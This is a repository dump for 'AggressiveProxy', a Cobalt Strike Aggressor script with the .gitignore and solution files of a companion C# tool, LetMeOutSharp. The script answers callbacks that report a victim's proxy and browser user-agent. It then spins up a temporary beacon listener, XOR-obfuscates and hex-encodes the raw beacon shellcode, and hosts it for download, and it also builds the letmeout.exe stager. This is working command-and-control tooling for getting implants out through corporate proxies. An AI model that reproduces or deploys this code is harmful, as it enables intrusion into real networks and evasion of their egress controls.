├── .gitignore ├── AggressiveProxy.cna ├── LetMeOutSharp.sln ├── LetMeOutSharp ├── .gitignore ├── LetMeOutSharp.sln └── LetMeOutSharp │ ├── Info.cs │ ├── Injector.cs │ ├── LetMeOutSharp.csproj │ ├── Program_template.cs │ ├── Properties │ └── AssemblyInfo.cs │ └── Utilities.cs └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # globs 2 | Makefile.in 3 | *.userprefs 4 | *.usertasks 5 | config.make 6 | config.status 7 | aclocal.m4 8 | install-sh 9 | autom4te.cache/ 10 | *.tar.gz 11 | tarballs/ 12 | test-results/ 13 | 14 | # Mac bundle stuff 15 | *.dmg 16 | *.app 17 | 18 | # content below from: https://github.com/github/gitignore/blob/master/Global/macOS.gitignore 19 | # General 20 | .DS_Store 21 | .AppleDouble 22 | .LSOverride 23 | 24 | # Icon must end with two \r 25 | Icon 26 | 27 | 28 | # Thumbnails 29 | ._* 30 | 31 | # Files that might appear in the root of a volume 32 | .DocumentRevisions-V100 33 | .fseventsd 34 | .Spotlight-V100 35 | .TemporaryItems 36 | .Trashes 37 | .VolumeIcon.icns 38 | .com.apple.timemachine.donotpresent 39 | 40 | # Directories potentially created on remote AFP share 41 | .AppleDB 42 | .AppleDesktop 43 | Network Trash Folder 44 | Temporary Items 45 | .apdisk 46 | 47 | # content below from: https://github.com/github/gitignore/blob/master/Global/Windows.gitignore 48 | # Windows thumbnail cache files 49 | Thumbs.db 50 | ehthumbs.db 51 | ehthumbs_vista.db 52 | 53 | # Dump file 54 | *.stackdump 55 | 56 | # Folder config file 57 | [Dd]esktop.ini 58 | 59 | # Recycle Bin used on file shares 60 | $RECYCLE.BIN/ 61 | 62 | # Windows Installer files 63 | *.cab 64 | *.msi 65 | *.msix 66 | *.msm 67 | *.msp 68 | 69 | # Windows shortcuts 70 | *.lnk 71 | 72 | # content below from: https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 73 | ## Ignore Visual Studio temporary files, build results, and 74 | ## files generated by popular Visual Studio add-ons. 75 | ## 76 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 77 | 78 | # User-specific files 79 | *.suo 80 | *.user 81 | *.userosscache 82 | *.sln.docstates 83 | 84 | # User-specific files (MonoDevelop/Xamarin Studio) 85 | *.userprefs 86 | 87 | # Build results 88 | [Dd]ebug/ 89 | [Dd]ebugPublic/ 90 | [Rr]elease/ 91 | [Rr]eleases/ 92 | x64/ 93 | x86/ 94 | bld/ 95 | [Bb]in/ 96 | [Oo]bj/ 97 | [Ll]og/ 98 | 99 | # Visual Studio 2015/2017 cache/options directory 100 | .vs/ 101 | # Uncomment if you have tasks that create the project's static files in wwwroot 102 | #wwwroot/ 103 | 104 | # Visual Studio 2017 auto generated files 105 | Generated\ Files/ 106 | 107 | # MSTest test Results 108 | [Tt]est[Rr]esult*/ 109 | [Bb]uild[Ll]og.* 110 | 111 | # NUNIT 112 | *.VisualState.xml 113 | TestResult.xml 114 | 115 | # Build Results of an ATL Project 116 | [Dd]ebugPS/ 117 | [Rr]eleasePS/ 118 | dlldata.c 119 | 120 | # Benchmark Results 121 | BenchmarkDotNet.Artifacts/ 122 | 123 | # .NET Core 124 | project.lock.json 125 | project.fragment.lock.json 126 | artifacts/ 127 | 128 | # StyleCop 129 | StyleCopReport.xml 130 | 131 | # Files built by Visual Studio 132 | *_i.c 133 | *_p.c 134 | *_h.h 135 | *.ilk 136 | *.meta 137 | *.obj 138 | *.iobj 139 | *.pch 140 | *.pdb 141 | *.ipdb 142 | *.pgc 143 | *.pgd 144 | *.rsp 145 | *.sbr 146 | *.tlb 147 | *.tli 148 | *.tlh 149 | *.tmp 150 | *.tmp_proj 151 | *_wpftmp.csproj 152 | *.log 153 | *.vspscc 154 | *.vssscc 155 | .builds 156 | *.pidb 157 | *.svclog 158 | *.scc 159 | 160 | # Chutzpah Test files 161 | _Chutzpah* 162 | 163 | # Visual C++ cache files 164 | ipch/ 165 | *.aps 166 | *.ncb 167 | *.opendb 168 | *.opensdf 169 | *.sdf 170 | *.cachefile 171 | *.VC.db 172 | *.VC.VC.opendb 173 | 174 | # Visual Studio profiler 175 | *.psess 176 | *.vsp 177 | *.vspx 178 | *.sap 179 | 180 | # Visual Studio Trace Files 181 | *.e2e 182 | 183 | # TFS 2012 Local Workspace 184 | $tf/ 185 | 186 | # Guidance Automation Toolkit 187 | *.gpState 188 | 189 | # ReSharper is a .NET coding add-in 190 | _ReSharper*/ 191 | *.[Rr]e[Ss]harper 192 | *.DotSettings.user 193 | 194 | # JustCode is a .NET coding add-in 195 | .JustCode 196 | 197 | # TeamCity is a build add-in 198 | _TeamCity* 199 | 200 | # DotCover is a Code Coverage Tool 201 | *.dotCover 202 | 203 | # AxoCover is a Code Coverage Tool 204 | .axoCover/* 205 | !.axoCover/settings.json 206 | 207 | # Visual Studio code coverage results 208 | *.coverage 209 | *.coveragexml 210 | 211 | # NCrunch 212 | _NCrunch_* 213 | .*crunch*.local.xml 214 | nCrunchTemp_* 215 | 216 | # MightyMoose 217 | *.mm.* 218 | AutoTest.Net/ 219 | 220 | # Web workbench (sass) 221 | .sass-cache/ 222 | 223 | # Installshield output folder 224 | [Ee]xpress/ 225 | 226 | # DocProject is a documentation generator add-in 227 | DocProject/buildhelp/ 228 | DocProject/Help/*.HxT 229 | DocProject/Help/*.HxC 230 | DocProject/Help/*.hhc 231 | DocProject/Help/*.hhk 232 | DocProject/Help/*.hhp 233 | DocProject/Help/Html2 234 | DocProject/Help/html 235 | 236 | # Click-Once directory 237 | publish/ 238 | 239 | # Publish Web Output 240 | *.[Pp]ublish.xml 241 | *.azurePubxml 242 | # Note: Comment the next line if you want to checkin your web deploy settings, 243 | # but database connection strings (with potential passwords) will be unencrypted 244 | *.pubxml 245 | *.publishproj 246 | 247 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 248 | # checkin your Azure Web App publish settings, but sensitive information contained 249 | # in these scripts will be unencrypted 250 | PublishScripts/ 251 | 252 | # NuGet Packages 253 | *.nupkg 254 | # The packages folder can be ignored because of Package Restore 255 | **/[Pp]ackages/* 256 | # except build/, which is used as an MSBuild target. 257 | !**/[Pp]ackages/build/ 258 | # Uncomment if necessary however generally it will be regenerated when needed 259 | #!**/[Pp]ackages/repositories.config 260 | # NuGet v3's project.json files produces more ignorable files 261 | *.nuget.props 262 | *.nuget.targets 263 | 264 | # Microsoft Azure Build Output 265 | csx/ 266 | *.build.csdef 267 | 268 | # Microsoft Azure Emulator 269 | ecf/ 270 | rcf/ 271 | 272 | # Windows Store app package directories and files 273 | AppPackages/ 274 | BundleArtifacts/ 275 | Package.StoreAssociation.xml 276 | _pkginfo.txt 277 | *.appx 278 | 279 | # Visual Studio cache files 280 | # files ending in .cache can be ignored 281 | *.[Cc]ache 282 | # but keep track of directories ending in .cache 283 | !*.[Cc]ache/ 284 | 285 | # Others 286 | ClientBin/ 287 | ~$* 288 | *~ 289 | *.dbmdl 290 | *.dbproj.schemaview 291 | *.jfm 292 | *.pfx 293 | *.publishsettings 294 | orleans.codegen.cs 295 | 296 | # Including strong name files can present a security risk 297 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 298 | #*.snk 299 | 300 | # Since there are multiple workflows, uncomment next line to ignore bower_components 301 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 302 | #bower_components/ 303 | 304 | # RIA/Silverlight projects 305 | Generated_Code/ 306 | 307 | # Backup & report files from converting an old project file 308 | # to a newer Visual Studio version. Backup files are not needed, 309 | # because we have git ;-) 310 | _UpgradeReport_Files/ 311 | Backup*/ 312 | UpgradeLog*.XML 313 | UpgradeLog*.htm 314 | ServiceFabricBackup/ 315 | *.rptproj.bak 316 | 317 | # SQL Server files 318 | *.mdf 319 | *.ldf 320 | *.ndf 321 | 322 | # Business Intelligence projects 323 | *.rdl.data 324 | *.bim.layout 325 | *.bim_*.settings 326 | *.rptproj.rsuser 327 | 328 | # Microsoft Fakes 329 | FakesAssemblies/ 330 | 331 | # GhostDoc plugin setting file 332 | *.GhostDoc.xml 333 | 334 | # Node.js Tools for Visual Studio 335 | .ntvs_analysis.dat 336 | node_modules/ 337 | 338 | # Visual Studio 6 build log 339 | *.plg 340 | 341 | # Visual Studio 6 workspace options file 342 | *.opt 343 | 344 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 345 | *.vbw 346 | 347 | # Visual Studio LightSwitch build output 348 | **/*.HTMLClient/GeneratedArtifacts 349 | **/*.DesktopClient/GeneratedArtifacts 350 | **/*.DesktopClient/ModelManifest.xml 351 | **/*.Server/GeneratedArtifacts 352 | **/*.Server/ModelManifest.xml 353 | _Pvt_Extensions 354 | 355 | # Paket dependency manager 356 | .paket/paket.exe 357 | paket-files/ 358 | 359 | # FAKE - F# Make 360 | .fake/ 361 | 362 | # JetBrains Rider 363 | .idea/ 364 | *.sln.iml 365 | 366 | # CodeRush personal settings 367 | .cr/personal 368 | 369 | # Python Tools for Visual Studio (PTVS) 370 | __pycache__/ 371 | *.pyc 372 | 373 | # Cake - Uncomment if you are using it 374 | # tools/** 375 | # !tools/packages.config 376 | 377 | # Tabs Studio 378 | *.tss 379 | 380 | # Telerik's JustMock configuration file 381 | *.jmconfig 382 | 383 | # BizTalk build output 384 | *.btp.cs 385 | *.btm.cs 386 | *.odx.cs 387 | *.xsd.cs 388 | 389 | # OpenCover UI analysis results 390 | OpenCover/ 391 | 392 | # Azure Stream Analytics local run output 393 | ASALocalRun/ 394 | 395 | # MSBuild Binary and Structured Log 396 | *.binlog 397 | 398 | # NVidia Nsight GPU debugger configuration file 399 | *.nvuser 400 | 401 | # MFractors (Xamarin productivity tool) working folder 402 | .mfractor/ 403 | 404 | # Local History for Visual Studio 405 | .localhistory/ -------------------------------------------------------------------------------- /AggressiveProxy.cna: -------------------------------------------------------------------------------- 1 | global('$selected_listener $proxy_handler_url'); 2 | 3 | $msbuild = "/Library/Frameworks/Mono.framework/Versions/Current/Commands/msbuild"; 4 | 5 | menubar("Proxy Handler", "proxy_handler"); 6 | 7 | popup proxy_handler { 8 | item "&Start Handler" { 9 | start_handler(); 10 | } 11 | item "&Stop Handler" { 12 | stop_handler(); 13 | } 14 | item "&Clean-up hosted content" { 15 | clean_site_contents(); 16 | } 17 | } 18 | 19 | sub start_handler { 20 | local('$dialog'); 21 | if($selected_listener) { 22 | show_message("[AggressiveProxy] ERROR: Already started..."); 23 | exit(); 24 | } 25 | $dialog = dialog("Proxy Handler Generation", %(listener => "", checkurl => "/proxy", responseContent => "ok"), &start_handler_Callback); 26 | drow_listener_stage($dialog, "listener", "Listener: "); 27 | drow_text($dialog, "checkurl", "Check URL: "); 28 | drow_text($dialog, "responseContent", "Expected Response Content: "); 29 | dbutton_action($dialog, "Start & Build binary"); 30 | dialog_show($dialog); 31 | } 32 | 33 | sub build_letmeout { 34 | local('$url $responseContent $handle $data $destination $buildver $build'); 35 | $url = $1; 36 | $responseContent = $2; 37 | 38 | println($url); 39 | $handle = openf(script_resource("LetMeOutSharp/LetMeOutSharp/Program_template.cs")); 40 | $data = readb($handle, -1); 41 | closef($handle); 42 | 43 | $data = strrep($data, "%C2URL%", $url); 44 | $data = strrep($data, "%RESPONSE%", $responseContent); 45 | 46 | $destination = openf(">".script_resource("LetMeOutSharp/LetMeOutSharp/Program.cs")); 47 | writeb($destination,$data); 48 | closef($destination); 49 | $buildver = "Release"; # "Release" or "Debug" 50 | 51 | println("[AggressiveProxy] INFO: Using msbuild: $msbuild"); 52 | $build = exec($msbuild . " -m -t:Rebuild -p:Configuration=" . $buildver . " -p:NoWarn=0168 " . script_resource("LetMeOutSharp/LetMeOutSharp.sln")); 53 | wait($build); 54 | # println(readAll($build)); # remove 55 | closef($build); 56 | println("[AggressiveProxy] INFO: The binary file should be located at: " . script_resource("LetMeOutSharp/LetMeOutSharp/bin/" . $buildver . "/letmeout.exe")); 57 | show_message("The binary file should be located at: " . script_resource("LetMeOutSharp/LetMeOutSharp/bin/" . $buildver . "/letmeout.exe")); 58 | } 59 | 60 | sub start_handler_Callback { 61 | local('%info $ssl $checkurl $responseContent'); 62 | if($selected_listener) { 63 | show_message("[AggressiveProxy] ERROR: Already started..."); 64 | exit(); 65 | } 66 | 67 | clean_site_contents(); 68 | println("[AggressiveProxy] INFO: Start serving..."); 69 | if ($3['listener'] eq "") { 70 | show_message("[AggressiveProxy] ERROR: No listener specified!"); 71 | exit(); 72 | } 73 | 74 | %info = listener_info($3['listener']); 75 | 76 | if(%info['payload'] ne "windows/beacon_http/reverse_http" && %info['payload'] ne "windows/beacon_https/reverse_https") 77 | { 78 | show_message("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy"); 79 | elog("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy"); 80 | println("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy"); 81 | exit(); 82 | } 83 | 84 | $selected_listener = copy(%info); 85 | println("[AggressiveProxy] INFO: Base listener is: $selected_listener['name']"); 86 | 87 | $selected_listener['name'] = 'agproxy'; 88 | $selected_listener['status'] = $null; 89 | $ssl = false; 90 | 91 | if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") { 92 | println("[AggressiveProxy] INFO: Using HTTPS"); 93 | $ssl = true; 94 | } 95 | 96 | $checkurl = $3['checkurl']; 97 | if(left($checkurl,1) ne "/") { 98 | println("[AggressiveProxy] WARNING: Url needs to start with /. Adding /."); 99 | $checkurl = "/" . $checkurl; 100 | } 101 | $responseContent = $3['responseContent']; 102 | 103 | $proxy_handler_url = $checkurl; 104 | $url = site_host($selected_listener['host'], $selected_listener['port'], $checkurl, $responseContent, "text/plain", "Proxy Shellcode Handler", $ssl); 105 | build_letmeout($url, $responseContent); 106 | } 107 | 108 | sub stop_handler { 109 | if($selected_listener) { 110 | println("[AggressiveProxy] INFO: Stopping..."); 111 | clean_site_contents(); 112 | $selected_listener = $null; 113 | } 114 | } 115 | 116 | sub clean_site_contents { 117 | # Cleanup site contents 118 | local('$type $key $value $description'); 119 | println("[AggressiveProxy] INFO: Cleaning site contents..."); 120 | foreach $key => $value (sites()){ 121 | $type = $value['Type']; 122 | $description = $value['Description']; 123 | if($type eq "page" && $description eq "Proxy Shellcode Handler") { 124 | site_kill($value['Port'], $value['URI']); 125 | } 126 | if($type eq "page" && $description eq "Proxy enabled shellcode") { 127 | site_kill($value['Port'], $value['URI']); 128 | } 129 | } 130 | } 131 | 132 | println("[AggressiveProxy] INFO: Serving you..."); 133 | 134 | on web_hit { 135 | 136 | local('$temp_listener_options $b64proxy $b64useragent $is64 $proxy $useragent $data $hexdata $payload $listener_name $arch $proxyshellcodeurl $variant'); 137 | 138 | if($selected_listener) { 139 | if ($2 eq $proxy_handler_url) { 140 | println("[AggressiveProxy] INFO: Proxy handler URL: $proxy_handler_url"); 141 | println("[AggressiveProxy] INFO: Visit in the proxy handler URL from: $3"); 142 | $b64proxy = $8['a']; 143 | $b64useragent = $8['b']; 144 | $is64 = $8['c']; 145 | $proxy = base64_decode($b64proxy); 146 | $useragent = base64_decode($b64useragent); 147 | $variant = ""; 148 | if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36") { 149 | # Chrome 150 | $variant = "chrome"; 151 | } else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51") { 152 | # Edge 153 | $variant = "edge"; 154 | } else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0") { 155 | # Firefox 156 | $variant = "firefox"; 157 | } else { 158 | # default 159 | $variant = "default"; 160 | } 161 | println("[AggressiveProxy] INFO: The proxy received is: $proxy"); 162 | println("[AggressiveProxy] INFO: User-agent: $useragent"); 163 | println("[AggressiveProxy] INFO: Variant to use: $variant"); 164 | 165 | $temp_listener_options = copy($selected_listener); 166 | $temp_listener_options['name'] = $null; 167 | $temp_listener_options['payload'] = $null; 168 | 169 | if($proxy) { 170 | if(right($proxy,1) eq "/") 171 | { 172 | $proxy = left($proxy,-1); #COBALT BUG with slash 173 | } 174 | $temp_listener_options['proxy'] = $proxy; 175 | } else { 176 | println("[AggressiveProxy] INFO: Using direct connectivity") 177 | $temp_listener_options['proxy'] = "*direct*"; 178 | } 179 | 180 | $arch = "x64"; 181 | if($is64 eq "0") { 182 | $arch = "x86"; 183 | } 184 | 185 | $temp_listener_options['profile'] = $variant; 186 | $proxyshellcodeurl = $b64proxy . base64_encode($variant) . base64_encode($arch); 187 | $listener_name = "agproxy-rand" . rand(10000); 188 | 189 | println("[AggressiveProxy] INFO: Using payload for: $selected_listener['payload']"); 190 | listener_create_ext($listener_name, $selected_listener['payload'], $temp_listener_options); # This will log a java.lang.RuntimeException: Another Beacon listener exists on your cobalt console 191 | println("[AggressiveProxy] INFO: Started temp listener: $listener_name"); 192 | 193 | when("listeners", lambda({ 194 | local('$data $xordata $hexdata $ssl'); 195 | println("[AggressiveProxy] INFO: Generating & hosting new payload \($listener_name - $arch\)"); 196 | $data = artifact_payload($listener_name, "raw", $arch); 197 | $xordata = str_xor($data, chr(42)); 198 | $hexdata = transform($xordata, "hex"); 199 | $ssl = false; 200 | if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") { 201 | println("[AggressiveProxy] INFO: Using HTTPS"); 202 | $ssl = true; 203 | } 204 | println("[AggressiveProxy] INFO: Shellcode length: " . strlen($hexdata)); 205 | println("[AggressiveProxy] INFO: Hosting payload at: /$proxyshellcodeurl") 206 | site_host($selected_listener['host'], $selected_listener['port'], "/$proxyshellcodeurl", "$hexdata", "text/plain", "Proxy enabled shellcode", $ssl); 207 | listener_delete($listener_name); 208 | 209 | 210 | }, $proxyshellcodeurl => $proxyshellcodeurl, $listener_name => $listener_name, $arch => $arch)); 211 | } 212 | } else { 213 | elog("[AggressiveProxy] WARNING: Not started yet"); 214 | println("[AggressiveProxy] WARNING: Not started yet"); 215 | } 216 | } 217 | -------------------------------------------------------------------------------- /LetMeOutSharp.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LetMeOutSharp", "LetMeOutSharp\LetMeOutSharp.csproj", "{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|anycpu = Debug|anycpu 9 | Release|anycpu = Release|anycpu 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.ActiveCfg = Debug|anycpu 13 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.Build.0 = Debug|anycpu 14 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.ActiveCfg = Release|anycpu 15 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.Build.0 = Release|anycpu 16 | EndGlobalSection 17 | EndGlobal 18 | -------------------------------------------------------------------------------- /LetMeOutSharp/.gitignore: -------------------------------------------------------------------------------- 1 | # globs 2 | Makefile.in 3 | *.userprefs 4 | *.usertasks 5 | config.make 6 | config.status 7 | aclocal.m4 8 | install-sh 9 | autom4te.cache/ 10 | *.tar.gz 11 | tarballs/ 12 | test-results/ 13 | 14 | # Mac bundle stuff 15 | *.dmg 16 | *.app 17 | 18 | # content below from: https://github.com/github/gitignore/blob/master/Global/macOS.gitignore 19 | # General 20 | .DS_Store 21 | .AppleDouble 22 | .LSOverride 23 | 24 | # Icon must end with two \r 25 | Icon 26 | 27 | 28 | # Thumbnails 29 | ._* 30 | 31 | # Files that might appear in the root of a volume 32 | .DocumentRevisions-V100 33 | .fseventsd 34 | .Spotlight-V100 35 | .TemporaryItems 36 | .Trashes 37 | .VolumeIcon.icns 38 | .com.apple.timemachine.donotpresent 39 | 40 | # Directories potentially created on remote AFP share 41 | .AppleDB 42 | .AppleDesktop 43 | Network Trash Folder 44 | Temporary Items 45 | .apdisk 46 | 47 | # content below from: https://github.com/github/gitignore/blob/master/Global/Windows.gitignore 48 | # Windows thumbnail cache files 49 | Thumbs.db 50 | ehthumbs.db 51 | ehthumbs_vista.db 52 | 53 | # Dump file 54 | *.stackdump 55 | 56 | # Folder config file 57 | [Dd]esktop.ini 58 | 59 | # Recycle Bin used on file shares 60 | $RECYCLE.BIN/ 61 | 62 | # Windows Installer files 63 | *.cab 64 | *.msi 65 | *.msix 66 | *.msm 67 | *.msp 68 | 69 | # Windows shortcuts 70 | *.lnk 71 | 72 | # content below from: https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 73 | ## Ignore Visual Studio temporary files, build results, and 74 | ## files generated by popular Visual Studio add-ons. 75 | ## 76 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 77 | 78 | # User-specific files 79 | *.suo 80 | *.user 81 | *.userosscache 82 | *.sln.docstates 83 | 84 | # User-specific files (MonoDevelop/Xamarin Studio) 85 | *.userprefs 86 | 87 | # Build results 88 | [Dd]ebug/ 89 | [Dd]ebugPublic/ 90 | [Rr]elease/ 91 | [Rr]eleases/ 92 | x64/ 93 | x86/ 94 | bld/ 95 | [Bb]in/ 96 | [Oo]bj/ 97 | [Ll]og/ 98 | 99 | # Visual Studio 2015/2017 cache/options directory 100 | .vs/ 101 | # Uncomment if you have tasks that create the project's static files in wwwroot 102 | #wwwroot/ 103 | 104 | # Visual Studio 2017 auto generated files 105 | Generated\ Files/ 106 | 107 | # MSTest test Results 108 | [Tt]est[Rr]esult*/ 109 | [Bb]uild[Ll]og.* 110 | 111 | # NUNIT 112 | *.VisualState.xml 113 | TestResult.xml 114 | 115 | # Build Results of an ATL Project 116 | [Dd]ebugPS/ 117 | [Rr]eleasePS/ 118 | dlldata.c 119 | 120 | # Benchmark Results 121 | BenchmarkDotNet.Artifacts/ 122 | 123 | # .NET Core 124 | project.lock.json 125 | project.fragment.lock.json 126 | artifacts/ 127 | 128 | # StyleCop 129 | StyleCopReport.xml 130 | 131 | # Files built by Visual Studio 132 | *_i.c 133 | *_p.c 134 | *_h.h 135 | *.ilk 136 | *.meta 137 | *.obj 138 | *.iobj 139 | *.pch 140 | *.pdb 141 | *.ipdb 142 | *.pgc 143 | *.pgd 144 | *.rsp 145 | *.sbr 146 | *.tlb 147 | *.tli 148 | *.tlh 149 | *.tmp 150 | *.tmp_proj 151 | *_wpftmp.csproj 152 | *.log 153 | *.vspscc 154 | *.vssscc 155 | .builds 156 | *.pidb 157 | *.svclog 158 | *.scc 159 | 160 | # Chutzpah Test files 161 | _Chutzpah* 162 | 163 | # Visual C++ cache files 164 | ipch/ 165 | *.aps 166 | *.ncb 167 | *.opendb 168 | *.opensdf 169 | *.sdf 170 | *.cachefile 171 | *.VC.db 172 | *.VC.VC.opendb 173 | 174 | # Visual Studio profiler 175 | *.psess 176 | *.vsp 177 | *.vspx 178 | *.sap 179 | 180 | # Visual Studio Trace Files 181 | *.e2e 182 | 183 | # TFS 2012 Local Workspace 184 | $tf/ 185 | 186 | # Guidance Automation Toolkit 187 | *.gpState 188 | 189 | # ReSharper is a .NET coding add-in 190 | _ReSharper*/ 191 | *.[Rr]e[Ss]harper 192 | *.DotSettings.user 193 | 194 | # JustCode is a .NET coding add-in 195 | .JustCode 196 | 197 | # TeamCity is a build add-in 198 | _TeamCity* 199 | 200 | # DotCover is a Code Coverage Tool 201 | *.dotCover 202 | 203 | # AxoCover is a Code Coverage Tool 204 | .axoCover/* 205 | !.axoCover/settings.json 206 | 207 | # Visual Studio code coverage results 208 | *.coverage 209 | *.coveragexml 210 | 211 | # NCrunch 212 | _NCrunch_* 213 | .*crunch*.local.xml 214 | nCrunchTemp_* 215 | 216 | # MightyMoose 217 | *.mm.* 218 | AutoTest.Net/ 219 | 220 | # Web workbench (sass) 221 | .sass-cache/ 222 | 223 | # Installshield output folder 224 | [Ee]xpress/ 225 | 226 | # DocProject is a documentation generator add-in 227 | DocProject/buildhelp/ 228 | DocProject/Help/*.HxT 229 | DocProject/Help/*.HxC 230 | DocProject/Help/*.hhc 231 | DocProject/Help/*.hhk 232 | DocProject/Help/*.hhp 233 | DocProject/Help/Html2 234 | DocProject/Help/html 235 | 236 | # Click-Once directory 237 | publish/ 238 | 239 | # Publish Web Output 240 | *.[Pp]ublish.xml 241 | *.azurePubxml 242 | # Note: Comment the next line if you want to checkin your web deploy settings, 243 | # but database connection strings (with potential passwords) will be unencrypted 244 | *.pubxml 245 | *.publishproj 246 | 247 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 248 | # checkin your Azure Web App publish settings, but sensitive information contained 249 | # in these scripts will be unencrypted 250 | PublishScripts/ 251 | 252 | # NuGet Packages 253 | *.nupkg 254 | # The packages folder can be ignored because of Package Restore 255 | **/[Pp]ackages/* 256 | # except build/, which is used as an MSBuild target. 257 | !**/[Pp]ackages/build/ 258 | # Uncomment if necessary however generally it will be regenerated when needed 259 | #!**/[Pp]ackages/repositories.config 260 | # NuGet v3's project.json files produces more ignorable files 261 | *.nuget.props 262 | *.nuget.targets 263 | 264 | # Microsoft Azure Build Output 265 | csx/ 266 | *.build.csdef 267 | 268 | # Microsoft Azure Emulator 269 | ecf/ 270 | rcf/ 271 | 272 | # Windows Store app package directories and files 273 | AppPackages/ 274 | BundleArtifacts/ 275 | Package.StoreAssociation.xml 276 | _pkginfo.txt 277 | *.appx 278 | 279 | # Visual Studio cache files 280 | # files ending in .cache can be ignored 281 | *.[Cc]ache 282 | # but keep track of directories ending in .cache 283 | !*.[Cc]ache/ 284 | 285 | # Others 286 | ClientBin/ 287 | ~$* 288 | *~ 289 | *.dbmdl 290 | *.dbproj.schemaview 291 | *.jfm 292 | *.pfx 293 | *.publishsettings 294 | orleans.codegen.cs 295 | 296 | # Including strong name files can present a security risk 297 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 298 | #*.snk 299 | 300 | # Since there are multiple workflows, uncomment next line to ignore bower_components 301 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 302 | #bower_components/ 303 | 304 | # RIA/Silverlight projects 305 | Generated_Code/ 306 | 307 | # Backup & report files from converting an old project file 308 | # to a newer Visual Studio version. Backup files are not needed, 309 | # because we have git ;-) 310 | _UpgradeReport_Files/ 311 | Backup*/ 312 | UpgradeLog*.XML 313 | UpgradeLog*.htm 314 | ServiceFabricBackup/ 315 | *.rptproj.bak 316 | 317 | # SQL Server files 318 | *.mdf 319 | *.ldf 320 | *.ndf 321 | 322 | # Business Intelligence projects 323 | *.rdl.data 324 | *.bim.layout 325 | *.bim_*.settings 326 | *.rptproj.rsuser 327 | 328 | # Microsoft Fakes 329 | FakesAssemblies/ 330 | 331 | # GhostDoc plugin setting file 332 | *.GhostDoc.xml 333 | 334 | # Node.js Tools for Visual Studio 335 | .ntvs_analysis.dat 336 | node_modules/ 337 | 338 | # Visual Studio 6 build log 339 | *.plg 340 | 341 | # Visual Studio 6 workspace options file 342 | *.opt 343 | 344 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 345 | *.vbw 346 | 347 | # Visual Studio LightSwitch build output 348 | **/*.HTMLClient/GeneratedArtifacts 349 | **/*.DesktopClient/GeneratedArtifacts 350 | **/*.DesktopClient/ModelManifest.xml 351 | **/*.Server/GeneratedArtifacts 352 | **/*.Server/ModelManifest.xml 353 | _Pvt_Extensions 354 | 355 | # Paket dependency manager 356 | .paket/paket.exe 357 | paket-files/ 358 | 359 | # FAKE - F# Make 360 | .fake/ 361 | 362 | # JetBrains Rider 363 | .idea/ 364 | *.sln.iml 365 | 366 | # CodeRush personal settings 367 | .cr/personal 368 | 369 | # Python Tools for Visual Studio (PTVS) 370 | __pycache__/ 371 | *.pyc 372 | 373 | # Cake - Uncomment if you are using it 374 | # tools/** 375 | # !tools/packages.config 376 | 377 | # Tabs Studio 378 | *.tss 379 | 380 | # Telerik's JustMock configuration file 381 | *.jmconfig 382 | 383 | # BizTalk build output 384 | *.btp.cs 385 | *.btm.cs 386 | *.odx.cs 387 | *.xsd.cs 388 | 389 | # OpenCover UI analysis results 390 | OpenCover/ 391 | 392 | # Azure Stream Analytics local run output 393 | ASALocalRun/ 394 | 395 | # MSBuild Binary and Structured Log 396 | *.binlog 397 | 398 | # NVidia Nsight GPU debugger configuration file 399 | *.nvuser 400 | 401 | # MFractors (Xamarin productivity tool) working folder 402 | .mfractor/ 403 | 404 | # Local History for Visual Studio 405 | .localhistory/ -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LetMeOutSharp", "LetMeOutSharp\LetMeOutSharp.csproj", "{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|anycpu = Debug|anycpu 9 | Release|anycpu = Release|anycpu 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.ActiveCfg = Debug|anycpu 13 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.Build.0 = Debug|anycpu 14 | 